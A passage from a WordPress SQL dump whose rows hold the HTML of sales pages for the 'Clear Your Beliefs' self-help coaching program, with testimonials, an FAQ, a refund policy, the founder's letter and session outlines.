psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-14 14:37:43', '2014-12-14 19:37:43', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2053, 2, '2014-12-14 14:36:45', '2014-12-14 19:36:45', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;<h3 class="widget-title">Ok I&#8217;m convinced</h3>			<a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It’s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.</p>\n<p>I was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There’s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" 